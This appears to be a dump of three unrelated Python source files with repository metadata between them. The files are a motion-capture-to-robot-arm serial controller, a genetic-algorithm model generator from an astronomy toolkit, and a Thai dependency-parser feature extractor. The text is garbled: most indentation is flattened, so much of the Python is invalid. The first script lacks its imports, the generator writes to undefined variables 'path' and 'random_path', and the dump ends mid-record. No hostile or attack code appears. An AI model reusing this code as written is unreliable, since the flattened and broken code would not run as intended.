from mpl_toolkits.mplot3d import Axes3D
import serial
def normalize(v):
norm = np.sqrt(np.sum(v**2))
if norm == 0:
return v
return v / norm
def lowpass(new, old):
p1 = 0.7
p2 = 0.3
return int(p1 * old + p2 * new)
#markers = list of twelve [x, y, z] float marker positions (three markers per tracked segment)
def calculateangles(markers):
global oldangles
m0 = np.array(markers[0], dtype=float)
m1 = np.array(markers[1], dtype=float)
m2 = np.array(markers[2], dtype=float)
m3 = np.array(markers[3], dtype=float)
m4 = np.array(markers[4], dtype=float)
m5 = np.array(markers[5], dtype=float)
m6 = np.array(markers[6], dtype=float)
m7 = np.array(markers[7], dtype=float)
m8 = np.array(markers[8], dtype=float)
m9 = np.array(markers[9], dtype=float)
m10 = np.array(markers[10], dtype=float)
m11 = np.array(markers[11], dtype=float)
#generate rotation matrices with respect to global coordinate system
y1 = m1 - m0
v1 = m1 - m2
z1 = np.cross(y1, v1)
x1 = np.cross(z1, y1)
y2 = m5 - m4
v2 = m4 - m3
z2 = np.cross(v2, y2)
x2 = np.cross(z2, y2)
y3 = m8 - m7
v3 = m7 - m6
z3 = np.cross(v3, y3)
x3 = np.cross(z3, y3)
y4 = m11 - m10
v4 = m10 - m9
z4 = np.cross(v4, y4)
x4 = np.cross(z4, y4)
x1 = normalize(x1)
y1 = normalize(y1)
z1 = normalize(z1)
x2 = normalize(x2)
y2 = normalize(y2)
z2 = normalize(z2)
x3 = normalize(x3)
y3 = normalize(y3)
z3 = normalize(z3)
x4 = normalize(x4)
y4 = normalize(y4)
z4 = normalize(z4)
#notation: Rab = rotation matrix of b from a; g = global
#print(x1)
Rg1 = np.transpose(np.array([x1, y1, z1]))
Rg2 = np.transpose(np.array([x2, y2, z2]))
Rg3 = np.transpose(np.array([x3, y3, z3]))
Rg4 = np.transpose(np.array([x4, y4, z4]))
#print(Rg1)
#print(Rg2)
#print(Rg3)
#print(Rg4)
#new rot matrices
R12 = np.matmul(np.linalg.inv(Rg1), Rg2)
R23 = np.matmul(np.linalg.inv(Rg2), Rg3)
R34 = np.matmul(np.linalg.inv(Rg3), Rg4)
#print(R12)
#print(R23)
#print(R34)
#calculate euler angles
'''
alphag1 = math.degrees(np.arctan(Rg1[1, 0]/Rg1[0, 0]))
betag1 = math.degrees(np.arcsin(-1 * Rg1[2, 0]))
gammag1 = math.degrees(np.arctan(Rg1[2, 1]/Rg1[2, 2]))
alpha12 = math.degrees(np.arctan(R12[1, 0]/R12[0, 0]))
beta12 = math.degrees(np.arcsin(-1 * R12[2, 0]))
gamma12 = math.degrees(np.arctan(R12[2, 1]/R12[2, 2]))
alpha23 = math.degrees(np.arctan(R23[1, 0]/R23[0, 0]))
beta23 = math.degrees(np.arcsin(-1 * R23[2, 0]))
gamma23 = math.degrees(np.arctan(R23[2, 1]/R23[2, 2]))
alpha34 = math.degrees(np.arctan(R34[1, 0]/R34[0, 0]))
beta34 = math.degrees(np.arcsin(-1 * R34[2, 0]))
gamma34 = math.degrees(np.arctan(R34[2, 1]/R34[2, 2]))
'''
betag1 = np.arctan2(-1*Rg1[2,0], np.sqrt(Rg1[0,0]**2 + Rg1[1,0]**2))
alphag1 = math.degrees(np.arctan2(Rg1[1,0]/np.cos(betag1), Rg1[0,0]/np.cos(betag1)))
gammag1 = math.degrees(np.arctan2(Rg1[2,1]/np.cos(betag1), Rg1[2,2]/np.cos(betag1)))
betag1 = math.degrees(betag1)
beta12 = np.arctan2(-1*R12[2,0], np.sqrt(R12[0,0]**2 + R12[1,0]**2))
alpha12 = math.degrees(np.arctan2(R12[1,0]/np.cos(beta12), R12[0,0]/np.cos(beta12)))
gamma12 = math.degrees(np.arctan2(R12[2,1]/np.cos(beta12), R12[2,2]/np.cos(beta12)))
beta12 = math.degrees(beta12)
beta23 = np.arctan2(-1*R23[2,0], np.sqrt(R23[0,0]**2 + R23[1,0]**2))
alpha23 = math.degrees(np.arctan2(R23[1,0]/np.cos(beta23), R23[0,0]/np.cos(beta23)))
gamma23 = math.degrees(np.arctan2(R23[2,1]/np.cos(beta23), R23[2,2]/np.cos(beta23)))
beta23 = math.degrees(beta23)
beta34 = np.arctan2(-1*R34[2,0], np.sqrt(R34[0,0]**2 + R34[1,0]**2))
alpha34 = math.degrees(np.arctan2(R34[1,0]/np.cos(beta34), R34[0,0]/np.cos(beta34)))
gamma34 = math.degrees(np.arctan2(R34[2,1]/np.cos(beta34), R34[2,2]/np.cos(beta34)))
beta34 = math.degrees(beta34)
#print(f"1 to 2 angles - alpha: {alpha12}° beta: {beta12}° gamma: {gamma12}°")
#print(f"2 to 3 angles - alpha: {alpha23}° beta: {beta23}° gamma: {gamma23}°")
#print(f"3 to 4 angles - alpha: {alpha34}° beta: {beta34}° gamma: {gamma34}°")
#print(f"Approximate angles: Shoulder Rotated ≈ {int(gamma12)}° - Shoulder Tilted ≈ {int(alpha12)}° - Elbow Tilted ≈ {int(alpha23)}° - Wrist Tilted ≈ {int(alpha34 if alpha34 > 0 else (alpha34 + 360))}° - Wrist Rotated ≈ {-1*int(gamma34)}°")
#low pass filter
newangles = (lowpass(alpha12, oldangles[0]), lowpass(beta12, oldangles[1]), lowpass(alpha23, oldangles[2]), lowpass(alpha34, oldangles[3]), lowpass(gamma34, oldangles[4]))
oldangles = newangles
return newangles
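# Illustrative sketch (not from the original script): the relative-rotation step above is
# R12 = inv(Rg1) . Rg2, i.e. segment 2 expressed in segment 1's frame, and a joint angle is
# then recovered with atan2. A self-contained check using two known rotations about z
# (relies only on math and numpy, which are already imported; never called here):
def _example_relative_rotation(a_deg=30.0, b_deg=80.0):
    def rot_z(deg):
        r = math.radians(deg)
        return np.array([[math.cos(r), -math.sin(r), 0.0],
                         [math.sin(r),  math.cos(r), 0.0],
                         [0.0,          0.0,         1.0]])
    R12 = np.matmul(np.linalg.inv(rot_z(a_deg)), rot_z(b_deg))  # relative rotation, as in calculateangles
    return math.degrees(np.arctan2(R12[1, 0], R12[0, 0]))       # yaw of R12, roughly b_deg - a_deg (50.0 here)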
#import numpy as np
#import pandas as pd
#SERVER = sys.argv[1]
SERVER = "192.168.1.230"
# instantiate context
o = owl.Context()
# connect to server with timeout of 10000000 microseconds
o.open(SERVER, "timeout=10000000") # initialize session
o.initialize("streaming=1 profile=profile-arm")
# main loop
evt = None
def getLatestEvent():
global evt
global o
#print("getting latest event...")
temp = None
while o.isOpen() and o.property("initialized") and evt:
temp = evt
evt = o.nextEvent()
evt = temp
while not evt:
evt = o.nextEvent(1000000)
print("searching for event")
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.axes.set_xlim3d(left=-2000, right=2000)
ax.axes.set_ylim3d(bottom=-2000, top=2000)
ax.axes.set_zlim3d(bottom=-2000, top=2000)
ax.set_autoscale_on(False)
lastmarkers = [[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0]]
oldangles = [0,0,0,0,0]
#serial port init
ser = serial.Serial('COM16', baudrate=19200)
#hello world ping + arm setup
ser.write(bytearray([255, 13, 1, 0, 64, 64, 64, 69, 69, 69, 69, 69, 39]))
print(list(ser.read(size=13)))
ser.write(bytearray([255, 13, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 15]))
print(list(ser.read(size=13)))
ser.write(bytearray([255, 13, 1, 2, 0, 3, 0, 0, 1, 0, 0, 0, 20]))
print(list(ser.read(size=13)))
ser.write(bytearray([255, 13, 41, 1, 1, 0, 0, 0, 182, 78, 0, 0, 60]))
ser.write(bytearray([255, 13, 42, 10, 0, 1, 0, 0, 0, 0, 0, 0, 66]))
ser.write(bytearray([255, 13, 42, 10, 0, 2, 0, 0, 0, 0, 0, 0, 67]))
ser.write(bytearray([255, 13, 42, 10, 0, 3, 0, 0, 0, 0, 0, 0, 68]))
ser.write(bytearray([255, 13, 2, 2, 0, 0, 0, 0, 0, 0, 0, 0, 17]))
ser.write(bytearray([255, 13, 42, 10, 0, 20, 0, 0, 0, 0, 0, 0, 85]))
ser.write(bytearray([255, 13, 42, 10, 0, 21, 0, 0, 0, 0, 0, 0, 86]))
ser.write(bytearray([255, 13, 42, 10, 0, 22, 0, 0, 0, 0, 0, 0, 87]))
ser.write(bytearray([255, 13, 42, 10, 0, 23, 0, 0, 0, 0, 0, 0, 88]))
ser.write(bytearray([255, 13, 42, 10, 0, 24, 0, 0, 0, 0, 0, 0, 89]))
ser.write(bytearray([255, 13, 82, 10, 0, 1, 0, 0, 0, 0, 0, 0, 106]))
ser.write(bytearray([255, 13, 82, 10, 0, 2, 0, 0, 0, 0, 0, 0, 107]))
ser.write(bytearray([255, 13, 82, 10, 0, 3, 0, 0, 0, 0, 0, 0, 108]))
ser.write(bytearray([255, 13, 42, 20, 0, 0, 0, 0, 0, 0, 0, 0, 75]))
ser.write(bytearray([255, 13, 42, 20, 1, 0, 0, 0, 0, 0, 0, 0, 76]))
ser.write(bytearray([255, 13, 42, 20, 2, 0, 0, 0, 0, 0, 0, 0, 77]))
ser.write(bytearray([255, 13, 42, 20, 3, 0, 0, 0, 0, 0, 0, 0, 78]))
ser.write(bytearray([255, 13, 42, 20, 4, 0, 0, 0, 0, 0, 0, 0, 79]))
ser.write(bytearray([255, 13, 42, 20, 5, 0, 0, 0, 0, 0, 0, 0, 80]))
ser.write(bytearray([255, 13, 42, 21, 0, 1, 0, 0, 0, 0, 0, 0, 77]))
ser.write(bytearray([255, 13, 42, 21, 0, 2, 0, 0, 0, 0, 0, 0, 78]))
ser.write(bytearray([255, 13, 42, 21, 1, 1, 0, 0, 0, 0, 0, 0, 78]))
ser.write(bytearray([255, 13, 42, 21, 1, 2, 0, 0, 0, 0, 0, 0, 79]))
ser.write(bytearray([255, 13, 42, 21, 2, 1, 0, 0, 0, 0, 0, 0, 79]))
ser.write(bytearray([255, 13, 42, 21, 2, 2, 0, 0, 0, 0, 0, 0, 80]))
ser.write(bytearray([255, 13, 42, 21, 3, 1, 0, 0, 0, 0, 0, 0, 80]))
ser.write(bytearray([255, 13, 42, 21, 3, 2, 0, 0, 0, 0, 0, 0, 81]))
ser.write(bytearray([255, 13, 42, 21, 4, 1, 0, 0, 0, 0, 0, 0, 81]))
ser.write(bytearray([255, 13, 42, 21, 4, 2, 0, 0, 0, 0, 0, 0, 82]))
ser.write(bytearray([255, 13, 42, 21, 5, 1, 0, 0, 0, 0, 0, 0, 82]))
ser.write(bytearray([255, 13, 42, 21, 5, 2, 0, 0, 0, 0, 0, 0, 83]))
ser.write(bytearray([255, 13, 42, 22, 0, 1, 0, 0, 0, 0, 0, 0, 78]))
ser.write(bytearray([255, 13, 42, 22, 0, 2, 0, 0, 0, 0, 0, 0, 79]))
ser.write(bytearray([255, 13, 32, 1, 0, 64, 0, 0, 0, 0, 0, 0, 110]))
ser.write(bytearray([255, 13, 11, 0, 1, 10, 0, 0, 4, 0, 0, 0, 39]))
ser.write(bytearray([255, 13, 11, 0, 2, 10, 0, 0, 4, 0, 0, 0, 40]))
ser.write(bytearray([255, 13, 11, 0, 3, 10, 0, 0, 4, 0, 0, 0, 41]))
ser.write(bytearray([255, 13, 11, 0, 4, 10, 0, 0, 4, 0, 0, 0, 42]))
ser.write(bytearray([255, 13, 11, 0, 5, 10, 0, 0, 4, 0, 0, 0, 43]))
ser.write(bytearray([255, 13, 11, 0, 6, 10, 0, 0, 0, 0, 0, 0, 40]))
ser.write(bytearray([255, 13, 11, 0, 6, 11, 0, 0, 16, 0, 0, 0, 57]))
ser.write(bytearray([255, 13, 31, 0, 0, 9, 0, 0, 0, 0, 0, 0, 53]))
ser.write(bytearray([255, 13, 31, 0, 0, 11, 0, 0, 3, 0, 0, 0, 58]))
ser.write(bytearray([255, 13, 31, 0, 0, 11, 0, 0, 3, 0, 0, 0, 58]))
ser.write(bytearray([255, 13, 31, 0, 0, 44, 0, 0, 200, 0, 0, 0, 32]))
ser.write(bytearray([255, 13, 31, 0, 0, 52, 0, 0, 0, 0, 0, 0, 96]))
ser.write(bytearray([255, 13, 31, 0, 0, 48, 0, 0, 255, 15, 0, 0, 106]))
ser.write(bytearray([255, 13, 31, 0, 0, 12, 0, 0, 255, 0, 0, 0, 55]))
#turn on torque for all joints after 5 secs:
print("turning torque on for all joints in 5 seconds...")
time.sleep(5)
ser.write(bytearray([255, 13, 21, 1, 0, 64, 0, 0, 1, 0, 0, 0, 100]))
ser.write(bytearray([255, 13, 21, 1, 1, 64, 0, 0, 1, 0, 0, 0, 101]))
ser.write(bytearray([255, 13, 21, 1, 2, 64, 0, 0, 1, 0, 0, 0, 102]))
ser.write(bytearray([255, 13, 21, 1, 3, 64, 0, 0, 1, 0, 0, 0, 103]))
ser.write(bytearray([255, 13, 21, 1, 4, 64, 0, 0, 1, 0, 0, 0, 104]))
ser.write(bytearray([255, 13, 21, 1, 5, 64, 0, 0, 1, 0, 0, 0, 105]))
print("torque is on.")
for joint in range(1,6):
if joint == 2:
ser.write(bytearray([255, 13, 21, 1, joint, 112, 0, 0, 208, 7, 0, 0, 106+joint]))
ser.write(bytearray([255, 13, 21, 1, joint, 108, 0, 0, 232, 3, 0, 0, 122+joint]))
ser.write(bytearray([255, 13, 51, 20, joint, 0, 0, 0, 255, 255, 252, 124, (84+joint+255+255+252+124)%256]))
else:
ser.write(bytearray([255, 13, 21, 1, joint, 112, 0, 0, 208, 7, 0, 0, 106+joint]))
ser.write(bytearray([255, 13, 21, 1, joint, 108, 0, 0, 232, 3, 0, 0, 122+joint]))
ser.write(bytearray([255, 13, 51, 20, joint, 0, 0, 0, 0, 0, 0, 0, (84+joint)%256]))
time.sleep(3)
def send(shoulder, elbow, forearm, wrist, hand):
global ser
speedbytes = (0).to_bytes(4, byteorder='little', signed=True)
accelbytes = (0).to_bytes(4, byteorder='little', signed=True)
shoulder = int(max(-60, min(60, shoulder)))
elbow = int(max(-45, min(90, elbow)))
forearm = int(max(0, min(180, forearm)))
wrist = int(max(-90, min(90, wrist)))
hand = int(max(-90, min(90, hand)))
#accelbytes = (0).to_bytes(4, byteorder='little', signed=True)
for joint in range(1, 5):
ser.write(bytearray([255, 13, 21, 1, joint, 112, 0, 0, speedbytes[0], speedbytes[1], speedbytes[2], speedbytes[3], (147+joint+speedbytes[0]+speedbytes[1]+speedbytes[2]+speedbytes[3])%256]))
ser.write(bytearray([255, 13, 21, 1, joint, 108, 0, 0, accelbytes[0], accelbytes[1], accelbytes[2], accelbytes[3], (143+joint+accelbytes[0]+accelbytes[1]+accelbytes[2]+accelbytes[3])%256]))
if joint == 0:
angle = int((shoulder-45)*10)
elif joint == 1:
angle = int(elbow*-10)
elif joint == 2:
angle = int((forearm-90)*10)
elif joint == 3:
angle = int(wrist*10)
elif joint == 4:
angle = int(hand*10)
anglebytes = (angle).to_bytes(4, byteorder='little', signed=True)
ser.write(bytearray([255, 13, 51, 20, joint, 0, 0, 0, anglebytes[0], anglebytes[1], anglebytes[2], anglebytes[3], (84+joint+anglebytes[0]+anglebytes[1]+anglebytes[2]+anglebytes[3])%256]))
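# Illustrative note (inferred from the byte patterns above, not from protocol documentation):
# each frame written to the controller appears to be 13 bytes -- a 0xFF header, the length
# byte 13, a ten-byte payload, and a trailing checksum equal to the sum of bytes 1..11
# modulo 256. A small hypothetical helper that reproduces those checksums (never called here):
def _example_frame(payload10):
    body = [255, 13] + list(payload10)
    return bytearray(body + [sum(body[1:]) % 256])
# e.g. _example_frame([1, 1, 0, 0, 0, 0, 0, 0, 0, 0]) reproduces the second setup frame above.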
#print("commands sent.")
#while evt or (o.isOpen() and o.property("initialized")):
def animate(i):
global evt
global lastmarkers
#print(lastmarkers)
#t1 = time.time()
ax.cla()
ax.axes.set_xlim3d(left=-2000, right=2000)
ax.axes.set_ylim3d(bottom=-2000, top=2000)
ax.axes.set_zlim3d(bottom=-2000, top=2000)
ax.set_autoscale_on(False)
ax.scatter(0,0,0)
ax.text(0,0,0,"(0, 0, 0)")
# poll for events with a timeout (microseconds)
getLatestEvent()
# nothing received, keep waiting
if not evt:
return
# process event
if evt.type_id == owl.Type.FRAME:
# print markers
if "markers" in evt:
#good = True
count = 0
for m in evt.markers:
ax.scatter(m.x, m.y, m.z)
if not (m.x == 0 or m.y == 0 or m.z == 0):
lastmarkers[count][0] = m.x
lastmarkers[count][1] = m.y
lastmarkers[count][2] = m.z
#print(str(m.x) + ", " + str(m.y) + ", " + str(m.z))
count += 1
if [0,0,0] not in lastmarkers:
angles = calculateangles(lastmarkers)
ax.text(-1500,0,0,f"Shoulder Rotated ≈ {angles[1]}°\nShoulder Tilted ≈ {angles[0]}°\nElbow Tilted ≈ {angles[2]}°\nWrist Tilted ≈ {angles[3]}°\nWrist Rotated ≈ {angles[4]}°")
#if i % 2 == 0:
#for joint in range(0, 5):
#if abs(angles[joint] - oldangles[joint]) > 1000:
#good = False
#if good or i == 1:
send(angles[1], angles[0], angles[2], angles[3], angles[4])
#oldangles = angles
elif evt.type_id == owl.Type.ERROR:
# handle errors
print(evt.name, evt.data)
if evt.name == "fatal":
return
elif evt.name == "done":
# done event is sent when master connection stops session
print("done")
return
#t2 = time.time()
#print(f"Completed 1 iteration in {t2 - t1} seconds.")
ani = anim.FuncAnimation(fig, animate, interval=0)
'''
cont = input("Enter any text to close server & untorque servoes.")
if cont:
o.done()
o.close()
print("torque off in 3 seconds...")
time.sleep(3)
ser.write(bytearray([255, 13, 21, 1, 0, 64, 0, 0, 0, 0, 0, 0, 99]))
ser.write(bytearray([255, 13, 21, 1, 1, 64, 0, 0, 0, 0, 0, 0, 100]))
ser.write(bytearray([255, 13, 21, 1, 2, 64, 0, 0, 0, 0, 0, 0, 101]))
ser.write(bytearray([255, 13, 21, 1, 3, 64, 0, 0, 0, 0, 0, 0, 102]))
ser.write(bytearray([255, 13, 21, 1, 4, 64, 0, 0, 0, 0, 0, 0, 103]))
ser.write(bytearray([255, 13, 21, 1, 5, 64, 0, 0, 0, 0, 0, 0, 104]))
ser.close()
'''
#result_available.wait(0.020)
# end main loop
# end session
#o.done()
# close socket
#o.close()
|
[
"noreply@github.com"
] |
jonathanzxu.noreply@github.com
|
689b7417c6d3e9da284d1cd85628ac8fba391625
|
f03bd5bd7873c5cc33b4ef5199f219539f3a340e
|
/CAAPR/CAAPR_AstroMagic/PTS/pts/modeling/fitting/modelgenerators/initial.py
|
5f85234c172d0a8fa170625b8c8bc5f8810e3bf3
|
[
"GPL-1.0-or-later",
"AGPL-3.0-only",
"AGPL-3.0-or-later",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-philippe-de-muyter",
"MIT"
] |
permissive
|
Stargrazer82301/CAAPR
|
5f8a7033b16792f23abd5d07021b53b9228a5db4
|
62b2339beb2eb956565e1605d44d92f934361ad7
|
refs/heads/master
| 2022-08-29T02:53:33.658022
| 2022-08-05T19:06:46
| 2022-08-05T19:06:46
| 49,977,601
| 8
| 1
|
MIT
| 2022-08-05T19:06:47
| 2016-01-19T19:32:42
|
Python
|
UTF-8
|
Python
| false
| false
| 4,272
|
py
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.modeling.fitting.modelgenerators.initial Contains the InitialModelGenerator class.
# -----------------------------------------------------------------
# Ensure Python 3 compatibility
from __future__ import absolute_import, division, print_function
# Import the relevant PTS classes and modules
from ....core.tools.logging import log
from ....evolve.engine import GAEngine, RawScoreCriteria
from ....evolve.genomes.list1d import G1DList
from ....evolve import mutators
from ....evolve import initializators
from ....evolve import constants
from .generator import ModelGenerator
from ....core.tools.random import save_state
# -----------------------------------------------------------------
class InitialModelGenerator(ModelGenerator):
"""
This class...
"""
def __init__(self):
"""
The constructor ...
:return:
"""
# Call the constructor of the base class
super(InitialModelGenerator, self).__init__()
# The genetic algorithm engine
self.engine = None
# -----------------------------------------------------------------
def setup(self):
"""
This function ...
:return:
"""
# Call the setup function of the base class
super(InitialModelGenerator, self).setup()
# Create the first genome
genome = G1DList(self.nparameters)
# Set genome options
genome.setParams(minima=self.parameter_minima, maxima=self.parameter_maxima, bestrawscore=0.00, rounddecimal=2)
genome.initializator.set(initializators.HeterogeneousListInitializerReal)
# genome.mutator.set(mutators.HeterogeneousListMutatorRealRange)
genome.mutator.set(mutators.HeterogeneousListMutatorRealGaussian)
# Create the genetic algorithm engine
self.engine = GAEngine(genome)
# Set options for the engine
self.engine.terminationCriteria.set(RawScoreCriteria)
self.engine.setMinimax(constants.minimaxType["minimize"])
self.engine.setGenerations(5)
self.engine.setCrossoverRate(0.5)
self.engine.setPopulationSize(100)
self.engine.setMutationRate(0.5)
# Initialize the genetic algorithm
self.engine.initialize()
# -----------------------------------------------------------------
def generate(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Generating the initial population of models ...")
# Get the initial population
population = self.engine.get_population()
# Loop over the individuals of the population
parameter_names = self.parameter_names
for individual in population:
# Loop over all the genes (parameters)
for i in range(len(individual)):
# Get the parameter value
value = individual[i]
# Add the parameter value to the dictionary
self.parameters[parameter_names[i]].append(value)
# -----------------------------------------------------------------
def write(self):
"""
This function ...
:return:
"""
# Write the genetic algorithm engine
self.write_engine()
# Write the state of the random number generator
self.write_prng()
# -----------------------------------------------------------------
def write_engine(self):
"""
This function ...
:return:
"""
# Save the genetic algorithm
self.engine.saveto(path)
# -----------------------------------------------------------------
def write_prng(self):
"""
This function ...
:return:
"""
# Save the state of the random generator
save_state(random_path)
# -----------------------------------------------------------------
|
[
"cjrc88@gmail.com"
] |
cjrc88@gmail.com
|
2406d9af34f7c194e5dd1d3f09c112f9e766f4de
|
b25489128f5f3ab049822b449d155d6d33c3a6ba
|
/extract_features.py
|
3fa6efe58e3975ee114e003e030e8eb41cafa350
|
[] |
no_license
|
ssutee/naist-parser
|
9a7e115140b9ea05deddfa865e3d97a26931abba
|
8febb14f482cf6fdc159ed5b603daad4f37e0700
|
refs/heads/master
| 2020-04-04T17:25:03.502787
| 2012-11-02T19:29:16
| 2012-11-02T19:29:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,738
|
py
|
#!/usr/bin/python2.5
import sys,os,re
#sstc_parser_path = os.path.join(os.path.dirname(sys.argv[0]), os.pardir, 'sstc_parser')
#sys.path.insert(0, os.path.abspath(sstc_parser_path))
#import sstc_parser
import xml.etree.ElementTree as ET
from naist_parser.maxent_utils import generate_features,create_between_pos_table,extract_features
from naist_parser.common_utils import decode_punc,encode_number,get_simplified_pos
def load_pos(pos_file):
ptable = {}
for line in open(pos_file).readlines():
tokens = line.split()
word,pos = [],[]
for token in tokens:
if re.match('\w+',token):
pos.append(token)
else:
word.append(token)
if ' '.join(word) not in ptable:
ptable[' '.join(word)] = set(pos)
else:
ptable[' '.join(word)] |= set(pos)
return ptable
def get_pos_features(ptable,word):
pos = []
if word in ptable:
pos = ptable[word]
return ' '.join(map(lambda x: str(x in pos), all_pos))
def get_simplified_pos_features(ptable,word):
pos = []
if word in ptable:
pos = ptable[word]
sim_pos = map(get_simplified_pos,pos)
return ' '.join(map(lambda x: str(x in sim_pos), all_simplified_pos))
def is_content_word(pos):
if pos in Noun+Verb+Adjective+Adverb: return 'True'
return 'False'
def extract_training_features(e,child,itable):
if e == 'U-HEAD':
pword,ppos,pspos = 'U-HEAD','U-HEAD','U-HEAD'
psnode = -1
piscon = False
else:
pword = e.get('word').replace(' ','_')
ppos = e.get('pos')
psnode = map(int,e.get('snode').split('_'))
pspos = get_simplified_pos(ppos)
piscon = is_content_word(ppos)
cword = child.get('word').replace(' ','_')
cpos = child.get('pos')
csnode = map(int,child.get('snode').split('_'))
cspos = get_simplified_pos(cpos)
ciscon = is_content_word(cpos)
skip = str(abs(psnode[1]-csnode[0]))
loc = 'R'
if psnode[0] > csnode[0]:
loc = 'L'
if psnode > -1:
i = itable.index([psnode[0],psnode[1],pword,ppos])
if i == 0: # starting node
ppword,pppos = '-S-','-S-'
elif i == len(itable)-1: # ending node
npword,nppos = '-E-','-E-'
if i != 0:
x,x,ppword,pppos = itable[i-1]
if i != len(itable)-1:
x,x,npword,nppos = itable[i+1]
else:
ppword,pppos,npword,nppos = 'U-HEAD','U-HEAD','U-HEAD','U-HEAD'
j = itable.index([csnode[0],csnode[1],cword,cpos])
if j == 0: # starting node
pcword,pcpos = '-S-','-S-'
elif j == len(itable)-1: # ending node
ncword,ncpos = '-E-','-E-'
if j != 0:
x,x,pcword,pcpos = itable[j-1]
if j != len(itable)-1:
x,x,ncword,ncpos = itable[j+1]
features = generate_features(pword,ppos,cword,cpos,ppword,pppos,npword,nppos,pcword,pcpos,ncword,ncpos,loc,skip)
return features
def filter_blank(etree):
if etree.getchildren() == []:
if etree.get('word') == None:
return ET.Element('node')
if etree.get('word') == '_':
return None
word = etree.get('word')
pos = etree.get('pos')
snode = etree.get('snode')
stree = etree.get('stree')
node = ET.Element('node')
node.set('word',word)
node.set('pos',pos)
node.set('snode',snode)
node.set('stree',stree)
return node
node = ET.Element('node')
word = etree.get('word')
pos = etree.get('pos')
snode = etree.get('snode')
stree = etree.get('stree')
node = ET.Element('node')
node.set('word',word)
node.set('pos',pos)
node.set('snode',snode)
node.set('stree',stree)
for child in etree.getchildren():
subnode = filter_blank(child)
if subnode != None:
node.append(subnode)
return node
def delete_blank(etree,text):
# find position of blank word
mark = []
for i,word in enumerate(text.split()):
if word == '_':
mark.append(i)
# recompute snode in etree
blank_node = []
for node in etree.getiterator():
if node.get('snode') != None:
x,y = map(int,node.get('snode').split('_'))
for m in mark:
if x > m:
x-=1
node.set('snode','%d_%d'%(x,x+1))
if node.get('word') == '_':
blank_node.append(node)
# remove blank word from etree
etree = filter_blank(etree.getroot())
etree = ET.ElementTree(etree)
# recompute stree
for node in etree.getiterator():
if node.get('stree') == None: continue
tmp = []
for child in node.getiterator():
x,y = map(int,child.get('snode').split('_'))
tmp.append(x)
tmp.append(y)
node.set('stree','%d_%d'%(min(tmp),max(tmp)))
return etree
def recompute_itable(itable,text):
# find position of blank word
mark = []
for i,word in enumerate(text.split()):
if word == '_':
mark.append(i)
# recompute snode in itable
tmp = []
for i,(x,y,w,p) in enumerate(itable):
for m in mark:
if x > m:
x-=1
itable[i][0] = x
itable[i][1] = x+1
if w == '_':
tmp.append(itable[i])
# remove blank word from itable
for t in tmp:
itable.remove(t)
return itable
def print_tree(tree,s):
if tree.getchildren() == []:
return '%s/%s'%(tree.get('word'),tree.get('pos'))
s = '%s/%s'%(tree.get('word'),tree.get('pos'))
s += '( '
for child in tree.getchildren():
s += print_tree(child,s) + ','
s = s.strip(',') + ' )'
return s
#def gen_events(sstc,text):
# parser = sstc_parser.SSTCParser()
# etree = parser.parse(sstc,text)
#
# etree = delete_blank(etree,text)
# parser.itable = recompute_itable(parser.itable,text)
# text = text.replace('_','')
# positive = []
# for e in etree.getiterator():
# if e.get('word') == None: continue
# children = e.getchildren()
# if children != []:
# for child in children:
# positive.append(extract_training_features(e,child,parser.itable))
# negative = []
# for e1 in etree.getiterator():
# for e2 in etree.getiterator():
# if e1.get('word') == None or e2.get('word') == None: continue
# if e1 != e2:
# f = extract_training_features(e1,e2,parser.itable)
# if f not in positive:
# negative.append(f)
#
# pe = '\n'.join(map(lambda x:'Yes '+x,positive)).strip()
# ne = '\n'.join(map(lambda x:'No '+x,negative)).strip()
#
# return pe,ne
'''
def gen_events(sstc,text):
parser = sstc_parser.SSTCParser()
etree = parser.parse(sstc,text)
positive = []
negative = []
for e in etree.getiterator():
if e.get('word') == None: continue
children = e.getchildren()
if children != []:
for child in children:
positive.append(extract_training_features(e,child,parser.itable))
negative.append(extract_training_features(child,e,parser.itable))
pe = '\n'.join(map(lambda x:'Yes '+x,positive)).strip()
ne = '\n'.join(map(lambda x:'No '+x,negative)).strip()
return pe,ne
'''
def main_old():
lines = sys.__stdin__.readlines()
train_file = open('train.data','w')
ne_test_file = open('ne_test.data','w')
pe_test_file = open('pe_test.data','w')
all_test_file = open('all_test.data','w')
total_file = open('total.data','w')
i = 0
for line in lines:
if line.find('St:') == 0:
sstc = line[3:].strip()
if line.find('Ss:') == 0:
# try:
text = line[3:].strip()
pe,ne = gen_events(sstc,text)
i += 1
total_file.write(pe+'\n')
total_file.write(ne+'\n')
if i%10 == 0:
pe_test_file.write(pe+'\n')
ne_test_file.write(ne+'\n')
all_test_file.write(pe+'\n'+ne+'\n')
else:
train_file.write(pe+'\n')
train_file.write(ne+'\n')
# except AttributeError,e:
# print e
# pass
train_file.close()
pe_test_file.close()
ne_test_file.close()
all_test_file.close()
total_file.close()
def main():
lines = sys.__stdin__.readlines()
tmp = []
for line in lines:
if line.strip() != '':
tmp.append(line.strip())
else:
W = ['<root>'] + map(encode_number,map(str.strip,tmp[0].split('\t')))
T = ['<root-POS>'] + map(str.strip,tmp[1].split('\t'))
H = [-1] + map(str.strip,tmp[-1].split('\t'))
if len(W) < 2:
continue
nW = []
for i in range(len(W)):
if T[i] == 'npn':
nW.append('<npn>')
else:
nW.append(W[i])
W = nW
units = [(W[i].replace(' ','_'),T[i],H[i]) for i in range(len(W))]
pairs = [(int(h),i) for i,h in enumerate(H)]
b_table = create_between_pos_table(T)
for i in range(len(W)):
for j in range(i+1,len(W),1):
for di in ['L','R']:
ans = 'No'
if (di == 'L' and (j,i) in pairs) or (di == 'R' and (i,j) in pairs):
ans = 'Yes'
print ans,extract_features(i,j,di,units,b_table)
tmp = []
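# Illustrative note (derived from the code above, not from external documentation): main()
# expects blank-line separated blocks on stdin, where the first line holds the tab-separated
# words of a sentence, the second line their POS tags, and the last line the head index of
# each token; a <root> token is prepended before Yes/No-labelled features are printed for
# every (i, j, direction) pair.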
if __name__ == '__main__':
main()
|
[
